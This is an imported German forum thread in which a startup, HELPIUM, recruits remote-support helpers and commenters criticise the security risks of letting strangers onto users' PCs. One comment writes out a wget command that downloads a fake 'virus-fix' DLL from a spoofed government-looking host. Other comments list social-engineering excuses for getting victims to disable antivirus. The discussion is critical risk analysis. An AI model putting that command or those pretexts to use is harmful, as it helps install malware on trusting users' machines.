User-Help-Desk von zu Hause

Disclaimer: Dieser Thread wurde aus dem alten Forum importiert. Daher werden eventuell nicht alle Formatierungen richtig angezeigt. Der ursprüngliche Thread beginnt im zweiten Post dieses Threads.

User-Help-Desk von zu Hause
Hallo PC-Kenner, liebe Nerds, sehr geehrte Softwarespezialisten,

wir sind HELPIUM, ein junges Startup Unternehmen aus Darmstadt.

Derzeit sind wir dabei ein Onlineportal zu eröffnen, auf dem User mit Software-Problemen Spezialisten finden können, die das Problem per Remote Desktop beheben. Dafür stellen wir eine eigene Software zur Verfügung.

HELPIUM soll in diesem Gebiet DIE Anlaufstelle im Netz werden - um das zu schaffen, werden wir die Plattform bald aktiv bewerben und uns um möglichst viele User bemühen.
Und davon können Sie profitieren!

HELPIUM stellt Ihnen eine Online-Plattform zur Verfügung, auf der Sie, nach getaner Verifizierung bei uns, kostenlos ein Profil einrichten und sich als Spezialist (wir nennen sie „Lotsen“) registrieren können.

Selbstverständlich soll gute Arbeit auch belohnt werden: User, die Ihre Hilfe in Anspruch nehmen, vergüten die dafür benötigte Arbeitszeit. Den Preis für Ihre Dienstleistung können Sie entsprechend Ihres Könnens selbst festlegen!

  • Sie können Ihre Arbeitszeit frei einteilen
  • wir machen Ihnen keine Vorgaben darüber, wann Sie für die User zur Verfügung stehen müssen.
  • Sie können von überall HELPIUM nutzen; egal ob im Büro, zu Hause, in der Uni oder im Park.

Sie haben Interesse?

Auf https://www.helpium.de erfahren Sie mehr oder schreiben Sie uns direkt an
lotsen@helpium.de.

Wir freuen uns auf Sie!
Ihr HELPIUM Team


Sollen die willkürlich platzierten Zeilenumbrüche das Spannungsgefühl erhöhen oder nur die Notwendigkeit der Website verdeutlichen?


Ihr baut also eine Platform auf der irgendwelche Leute irgendwelchen anderen Leuten, die sie nicht kennen, Adminrechte auf ihrem Rechner geben sollen? Wer kontrolliert dass eure ‘Lotsen’ da nicht richtig groben Unfug treiben?


Wieso adminrechte?
Gibt doch genug Fernwartungssoftware bei der man andere nur zuschauen lässt oder nur gewisse Applikationen für die Benutzung frei schaltet. Die Frage ist einfach nur, wie die Remote Desktop Lösung da aussieht.


Hallo,

vielen Dank für Euer Feedback.

Alle Lotsen, die bei uns registriert sind, wurden von uns verifiziert und geprüft. Zudem muss jeder Lotse einer entsprechenden Erklärung, bzw. Verhaltensrichtlinie, zustimmen.
Außerdem erarbeiten wir gerade Sicherheitstipps für die Anwender, sodass die Anwender sensibilisiert werden.
Dank der eigens entwickelten Software besteht eine sichere Verbindung, und der User sieht während jeder Session genau, was der Lotse auf seinem System macht, so dass er jederzeit eingreifen kann.
Selbstverständlich kann eine bestehende Verbindung jederzeit abgebrochen werden.
Für jede Sitzung muss der User aktiv einen Lotsen „einladen“. Nachdem eine Remote Session beendet ist, kann sich der Lotse auch nicht mehr auf dem Usersystem einloggen. Es läuft im Hintergrund auch kein Dienst, der als offenes Tor für evtl. Angreifer dienen könnte.

Zudem haben wir ein Bewertungssystem, mit dem der User die Lotsen genau selektieren kann.

Wir kennen die Datenschutz- und Vertrauensproblematik, gerade in der heutigen Zeit, sehr genau. Und aus diesem Grund möchten wir umso mehr darauf achten, dass kein Unfug über diese Plattform getrieben wird.
Wir sind überzeugt, dass viele PC User da draußen auf Hilfe im Umgang mit dem Computer angewiesen sind, und möchten deshalb eine Hilfe für diese Leute anbieten.

Wir würden uns freuen, wenn Ihr Interesse hättet auch einer der Lotsen zu werden.

Viele Grüße
HELPIUM Team


Naja, das Problem, dass man jemandem ein schnelles ‘wget -o c:\windows\system32.dll http://bsi.bund.de.vu/virus-fix/system32.dll’ unterschiebt passiert immer und bei jedem Verfahren, wenn der Benutzer keinen Plan hat hilft da alles nix…


Das wird der Virenscanner schon erkennen!


Der Lotse muss nur schnell etwas von einer Website runterladen und starten, das “das Problem löst”. Dann kann er weiterarbeiten und das Problem wirklich lösen. Einen Monat später nimmt der PC an DDoS-Attacken teil, der Nutzer schickt unbewusst lustige .exe-Videos mit Katzen die in eine Box fallen an alle seine Freunde und irgendwie geht auch beim Onlinebanking was schief. Da der Nutzer tendentiell eh keine Ahnung hat, glaubt er im schlimmsten Fall, dass er durch seine eigene Dummheit “einen Virus” bekommen hat. Heute denken sowieso schon die Hälfte der Windowsdeppen, dass sie einen Virus haben, nur weil ihr PC sich mal wieder langsam anfühlt. Im besten Fall für den Angreifer checkt er aber einfach gar nix.

Der Angreifer hat derweil längst eine Fünf-Sterne-Bewertung für seine hilfreichen Dienste erhalten. Und dabei war er auch noch so günstig!


Kann mir nicht wirklich vorstellen, dass es sich für Botnetz-Betreiber rechnet, seinen Bot persönlich per Fernwartung auf jedes System zu installieren. Das geht doch über Massenmailings und Browserlücken im IE6 viel besser.

1 Like

Es soll ja Botnetz-Betreiber geben denen persönlicher KundenOpferkontakt noch wichtig ist!


Da gibt’s ganz einfache Ausreden:
„Bitte deaktivieren Sie vor der Installation ihren Virenscanner, da dies sonst zu Fehlverhalten führen könnte.“
„Sie haben bereits einen Virus, und verschiedene Virenscanner vertragen sich nicht.“


Hier wird immer von mehreren Sachen ausgegangen die nicht unbedingt stimmen müssen:

  1. Der Lotse hat aktiven Zugriff bei der Verbindung.
  2. Der Lotse kann über die Verbindung mehr machen als ich ihm erlaube.

Ein wget oder der Aufruf einer Seite wird schwer, wenn ich dem Lotsen nur Zugriff auf mein offenes Excel gebe. Und ich hoffe doch, dass die Remote Software das unterstützt.

1 Like

Wer nicht in der Lage ist, sich im Internet selbst eine Excel-Anleitung zu suchen, wird sich auch ohne weiteres vom “Fachmann”/“Lotsen” überreden lassen, ein Addon zu installieren, das die gewünschte Funktion nachzurüsten behauptet…

2 Likes

Ich hoffe, du glaubst nicht, dass ich diese Aussage ernst meinte. oO


Du meinst also, es gibt keine Angreifer, weil es zu leicht ist, andere Systeme anzugreifen? Du musst nicht der schnellste beim Wegrennen sein, solange jemand anderes langsamer ist? No risk, no fun, eh?

Ich halte das für einen attraktiven Nebenverdienst, wenn ich eh schon als „Lotse“ mein Geld verdiene, hier noch ein bisschen was anderes dazuzuinstallieren. Wieso installiert das Java-Update eine Toolbar? Das haben sie doch gar nicht nötig!

Dazu sagen die Anbieter: „Außerdem erarbeiten wir gerade Sicherheitstipps für die Anwender, sodass die Anwender sensibilisiert werden.“, „der User sieht während jeder Session genau, was der Lotse auf seinem System macht“. Ich denke das heißt, ja er hat aktiven Zugriff.

Die Hoffnung stirbt zuletzt.


Ich sehe da gerade ein ganz anderes Problem, vor allem im industriellen/gewerblichen Umfeld:

Auch wenn es nicht finanziell sinnvoll ist, manuell ein Botnetz zu installieren und selbst wenn wir einmal von der These ausgingen, dass die Remote-Verbindung selbst zu 100% sicher wäre und darüber keine Schadsoftware installiert werden könnte, könnte man damit immerhin einen potentiellen Angreifer (sagen wir mal im Umfeld der Industriespionage) die Möglichkeit geben, Schwachstellen in einem System über z.B. sich eröffnende Seitenkanäle auszuspähen.